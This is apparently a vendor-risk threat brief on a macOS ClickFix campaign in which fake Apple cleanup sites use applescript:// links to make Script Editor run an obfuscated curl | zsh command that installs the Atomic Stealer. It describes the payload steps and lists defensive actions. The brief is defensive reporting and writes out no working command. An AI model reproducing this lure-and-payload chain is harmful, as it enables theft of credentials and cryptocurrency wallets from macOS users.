HomeIntelligenceBrief
BREACH BRIEF🟠 High ThreatIntel

macOS ClickFix Campaign Uses Script Editor to Deploy Atomic Stealer Malware, Threatening Credential Security

A new macOS‑focused campaign abuses the built‑in Script Editor to deliver the Atomic Stealer (AMOS) stealer malware. Fake Apple‑themed cleanup sites trigger an applescript:// link that runs a curl|zsh payload, harvesting Keychain entries, browser data, and cryptocurrency wallets. Organizations with macOS endpoints should reassess application controls and user‑awareness programs.

LiveThreat™ Intelligence · 📅 April 09, 2026· 📰 bleepingcomputer.com
🟠
Severity
High
TI
Type
ThreatIntel
🎯
Confidence
High
🏢
Affected
3 sector(s)
Actions
4 recommended
📰
Source
bleepingcomputer.com

macOS Stealer Campaign Leverages Script Editor for ClickFix Malware Delivery

What Happened — Researchers observed a new campaign that delivers the Atomic Stealer (AMOS) malware to macOS devices by abusing the built‑in Script Editor through a ClickFix‑style social‑engineering lure. Fake Apple‑themed “disk‑cleanup” webpages use the applescript:// URL scheme to launch Script Editor with a pre‑filled curl | zsh command, which downloads and runs a Mach‑O binary that harvests credentials, crypto wallets, and system data.

Why It Matters for TPRM

  • Native macOS utilities can be weaponized, bypassing traditional application‑whitelisting.
  • Stolen Keychain and browser credentials enable lateral movement into SaaS and cloud services used by third‑party vendors.
  • Compromised endpoints become a supply‑chain risk, potentially exposing partner networks.

Who Is Affected — Any organization that deploys macOS endpoints, notably sectors such as technology, financial services, education, and design firms.

Recommended Actions

  • Enforce strict application‑control policies that block Script Editor from executing arbitrary scripts or applescript:// links.
  • Deploy web‑filtering to block known fake cleanup domains and the applescript:// scheme.
  • Ensure EDR/XDR solutions can detect the curl | zsh execution pattern and the subsequent Mach‑O payload.
  • Conduct user‑awareness training focused on ClickFix lures and the dangers of executing unsolicited scripts.

Technical Notes — Attack vector: phishing via counterfeit Apple cleanup sites; execution vector: Script Editor (AppleScript/JXA) runs an obfuscated curl | zsh command that decodes a base64‑gzip payload, writes /tmp/helper, strips extended attributes, makes it executable, and launches the Atomic Stealer binary. The malware exfiltrates Keychain entries, desktop files, browser autofill data, cryptocurrency wallet keys, cookies, stored credit‑card numbers, and system information. macOS 13.4 introduced warnings for ClickFix attacks, but the Script Editor variant circumvents those prompts. Source: https://www.bleepingcomputer.com/news/security/new-macos-stealer-campaign-uses-script-editor-in-clickfix-attack/

📰 Original Source
https://www.bleepingcomputer.com/news/security/new-macos-stealer-campaign-uses-script-editor-in-clickfix-attack/

This LiveThreat Intelligence Brief is an independent analysis. Read the original reporting at the link above.

Monitor Your Vendor Risk with LiveThreat™

Get automated breach alerts, security scorecards, and intelligence briefs when your vendors are compromised.

Start Free Trial → Learn About Scorecards
← All Intelligence Briefs Breach Watch Feed →